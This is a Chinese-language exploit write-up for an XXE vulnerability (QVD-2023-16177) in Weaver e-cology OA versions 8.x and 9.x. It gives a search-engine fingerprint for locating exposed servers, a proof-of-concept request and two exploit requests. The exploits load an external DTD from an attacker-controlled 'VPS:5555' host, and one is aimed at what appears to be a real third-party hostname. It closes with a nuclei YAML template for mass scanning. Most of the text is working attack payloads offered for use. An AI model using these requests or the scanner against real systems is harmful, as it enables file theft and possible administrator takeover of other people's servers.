漏洞概述
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
影响版本
泛微 EC 9.x 且补丁版本 < 10.58.2
泛微 EC 8.x 且补丁版本 < 10.58.2
漏洞复现
鹰图指纹:app.name="泛微 e-cology 9.0 OA"
登录页面如下:
POC:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
出现以上响应则说明存在该漏洞
EXP1:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: oa.emotoradvance.com:8008
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://VPS:5555/1.txt">
<M><syscode>&send;</syscode></M>
exp2:
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://VPS:5555/1.txt">
<M><syscode>&send;</syscode></M>
注:两个exp的区别在于漏洞路径不一样
vps也出现了请求
nuclei批量yaml文件
id: ecology-XXE-QVD-2023-16177
info:
name: 泛微E-Cology XXE漏洞
author: mhb17
severity: critical
description: 泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限
reference:
- https://blog.csdn.net/qq_41904294/article/details/131878446
tags: ecology,XXE
requests:
- raw:
- |-
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/xml
Content-Length: 32
<M><syscode>&send;</syscode></M>
matchers-condition: and
matchers:
- type: binary
part: body
binary:
- e5bc82e69e84
- type: word
part: header
words:
- '200'